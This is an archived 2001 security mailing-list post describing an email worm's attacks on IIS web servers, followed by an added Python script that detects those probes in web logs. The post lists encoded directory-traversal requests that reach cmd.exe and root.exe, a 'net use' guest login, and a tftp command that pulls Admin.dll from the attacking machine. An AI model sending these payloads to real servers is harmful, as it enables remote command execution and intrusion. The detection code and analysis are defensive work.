-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 18 Sep 2001, Cory McIntire wrote:

> I and a few others I know are getting bombarded on our machines with IIS
> requests....looks like another worm, and it's much smarter than before;
> it seems to stay within the same class A and sometimes the same class B
> as the attacking machine is in. Here is an excerpt of what I believe is
> the full scan....

Here's what I've been able to determine thus far:

There is an e-mail worm propagating right now that comes with the payload
'readme.exe'. I suspect this e-mail worm preys on Outlook MUAs, but I have
no confirmation of this since the e-mails I've received have been bounces.
(Whoever released one iteration of this worm has the "From" address as
'staffat_private'.)

This payload does a load of things to assure its propagation. However, it
differs from other e-mail-based worms in that it also launches a number of
web-based attacks. Namely:

  /scripts
  /MSADC
  /scripts/..%255c..
  /_vti_bin/..%255c../..%255c../..%255c..
  /_mem_bin/..%255c../..%255c../..%255c..
  /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
  /scripts/..%c1%1c..
  /scripts/..%c0%2f..
  /scripts/..%c0%af..
  /scripts/..%c1%9c..
  /scripts/..%%35%63..
  /scripts/..%%35c..
  /scripts/..%25%35%63..
  /scripts/..%252f..
  /root.exe?/c+
  /winnt/system32/cmd.exe?/c+
  net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
  tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20

As can be seen above, it also attempts to make a tftp retrieval for
Admin.dll.

*sigh* Yet another worm made possible by the insecurity of Microsoft.

- -Jay

Jay D. Dyson -- jdysonat_private
"There's always time for a good cup of coffee"
What doesn't kill us only makes us stronger.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.
-----END PGP SIGNATURE-----

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more
information on this free incident handling, management and tracking system
please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 10:44:44 PDT
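The request list in the post above is mostly one trick repeated: a directory traversal whose `..\` separator is hidden behind double percent-encoding (`%255c`, `%%35%63`, `%25%35%63`) or an overlong/malformed UTF-8 byte pair (`%c0%af`, `%c1%1c`, `%c1%9c`, `%c0%2f`). The following is an added example, not code from the post, showing how a defender can decode requests the way a lenient IIS would and flag these probes in web logs; the NCSA-style log lines, client addresses and `scan_log` helper are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Overlong/malformed UTF-8 sequences that IIS accepted as path separators;
# each appears verbatim in the request list above.
OVERLONG_SEP = re.compile(r"%c0%2f|%c0%af|%c1%1c|%c1%9c", re.I)
# What the post's requests execute (root.exe, cmd.exe) or fetch (Admin.dll).
WORM_MARKERS = ("/root.exe", "/winnt/system32/cmd.exe", "tftp -i", "admin.dll")
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/\d\.\d"')

def normalize_path(raw: str) -> str:
    """Decode like a lenient IIS: overlong separators become '/', two
    percent-decode passes turn %255c and %%35%63 into '\\', and '\\' becomes '/'."""
    path = OVERLONG_SEP.sub("/", raw)
    for _ in range(2):  # pass 1: %255c -> %5c, %%35%63 -> %5c; pass 2: %5c -> '\'
        path = unquote(path)
    return path.replace("\\", "/").lower()

def probe_reason(raw_path: str):
    """Return why a request matches the worm's probe set, or None if it does not."""
    path = normalize_path(raw_path)
    for marker in WORM_MARKERS:
        if marker in path:
            return "worm marker " + marker
    # Traversal that only exists after decoding: the encoding trick is the tell.
    if "/../" in path and "/../" not in raw_path.lower():
        return "encoded directory traversal"
    return None

def scan_log(lines):
    """Return (client_ip, raw_path, reason) for every flagged request line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m and (reason := probe_reason(m.group(2))):
            hits.append((m.group(1), m.group(2), reason))
    return hits

# Constructed sample log (NCSA-style) built from the request fragments in the post.
SAMPLE_LOG = """\
10.0.0.7 - - [18/Sep/2001:10:44:44 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
10.0.0.7 - - [18/Sep/2001:10:44:45 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
10.0.0.7 - - [18/Sep/2001:10:44:46 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
10.0.0.7 - - [18/Sep/2001:10:44:47 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 -
10.0.0.7 - - [18/Sep/2001:10:44:48 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../ HTTP/1.0" 404 -
10.0.0.9 - - [18/Sep/2001:10:45:01 -0700] "GET /index.html HTTP/1.0" 200 1234
10.0.0.9 - - [18/Sep/2001:10:45:02 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
"""
```

Running `scan_log(SAMPLE_LOG.splitlines())` flags six of the seven constructed lines and leaves the plain `/index.html` request alone; the decoded form is what makes a 404 for `/scripts/..%255c../...` recognisable as the same traversal as `/scripts/..%c1%1c../...`.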